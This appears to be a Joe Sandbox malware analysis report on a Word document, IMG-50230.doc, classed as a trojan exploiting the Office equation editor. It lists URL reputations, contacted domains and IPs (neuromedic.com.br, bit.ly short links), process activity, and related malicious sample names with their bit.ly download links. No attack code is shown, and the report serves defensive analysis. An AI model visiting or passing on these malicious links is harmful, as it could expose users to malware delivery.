        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
        http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://buscar.ozu.es/0%VirustotalBrowse
        http://buscar.ozu.es/0%Avira URL Cloudsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://www.ozu.es/favicon.ico0%VirustotalBrowse
        http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        neuromedic.com.br
        177.70.106.69
        truefalseunknown
        bit.ly
        67.199.248.10
        truefalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://bit.ly/3iWebUTfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
              high
              http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://search.ebay.de/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                high
                http://www.mtv.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                  high
                  http://www.rambler.ru/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                    high
                    http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                      high
                      http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                        high
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpfalse
                          high
                          http://buscar.ya.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl069577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://asp.usatoday.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://rover.ebay.comexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://ocsp.pki.goog/gts1o1core069577.exe, 00000004.00000002.2111244695.0000000002268000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://search.ebay.in/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://%s.comexplorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            low
                                            http://msk.afisha.ru/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpfalse
                                                high
                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://search.rediff.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://search.naver.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://www.google.ru/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.daum.net/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://buscar.ozu.es/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.about.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://ocsp.pki.goog/gsr20269577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://pki.goog/repository/069577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.2118547561.00000000041AD000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.ask.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.cjmall.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.centrum.cz/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://suche.t-online.de/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.google.it/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.auction.co.kr/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.amazon.de/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://sads.myspace.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://crl.entrust.net/2048ca.crl069577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                                                  high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.google.si/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.google.cz/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.soso.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.univision.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://busca.orange.es/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.target.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://buscador.terra.es/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.iask.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.tesco.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.interpark.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown

                                                                                                                                          Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          177.70.106.69
                                                                                                                                          unknownBrazil
                                                                                                                                          262545MandicSABRfalse
                                                                                                                                          67.199.248.11
                                                                                                                                          unknownUnited States
                                                                                                                                          396982GOOGLE-PRIVATE-CLOUDUStrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                          Analysis ID:344787
                                                                                                                                          Start date:27.01.2021
                                                                                                                                          Start time:06:50:32
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 10m 58s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:light
                                                                                                                                          Sample file name:IMG-50230.doc
                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.expl.evad.winDOC@9/13@4/2
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HDC Information:
                                                                                                                                          • Successful, ratio: 24.7% (good quality ratio 22.8%)
                                                                                                                                          • Quality average: 73.5%
                                                                                                                                          • Quality standard deviation: 30.8%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                          • Number of executed functions: 0
                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Adjust boot time
                                                                                                                                          • Enable AMSI
                                                                                                                                          • Found application associated with file extension: .doc
                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                          • Attach to Office via COM
                                                                                                                                          • Scroll down
                                                                                                                                          • Close Viewer
                                                                                                                                          Warnings:
                                                                                                                                          Show All
                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.23.36
                                                                                                                                          • Excluded domains from analysis (whitelisted): www.google.com
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          06:51:36API Interceptor103x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                          06:51:41API Interceptor76x Sleep call for process: 69577.exe modified
                                                                                                                                          06:51:51API Interceptor34x Sleep call for process: AddInProcess32.exe modified
                                                                                                                                          06:52:06API Interceptor127x Sleep call for process: rundll32.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          67.199.248.11IMG_761213.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/36cLFZQ
                                                                                                                                          IMG-51033.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3a5RvO4
                                                                                                                                          IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3ojMXsu
                                                                                                                                          FedEx 77258441873.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/39eF6Iw
                                                                                                                                          IMG_15506.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/39f8K05
                                                                                                                                          RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2Y1IfVt
                                                                                                                                          file.rtfGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/39M5sk2
                                                                                                                                          Contract Documents IMG_15603.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3bLif93
                                                                                                                                          Order IMG_7102.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2M6VrFR
                                                                                                                                          IMG_40317.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/35T26uw
                                                                                                                                          Order IMG_501032.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/38ZhgA5
                                                                                                                                          IMG_010357.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2M6Lubl
                                                                                                                                          IMG_80137.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2Necw17
                                                                                                                                          Soa.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2XW0prL
                                                                                                                                          IMG_06176.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3o1C9yN
                                                                                                                                          IMG_53091.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/38TNzQV
                                                                                                                                          IMG_26017.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3p08Kqo
                                                                                                                                          FedEx 772584418730.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3quaS9X
                                                                                                                                          IMG_13791.docGet hashmaliciousBrowse
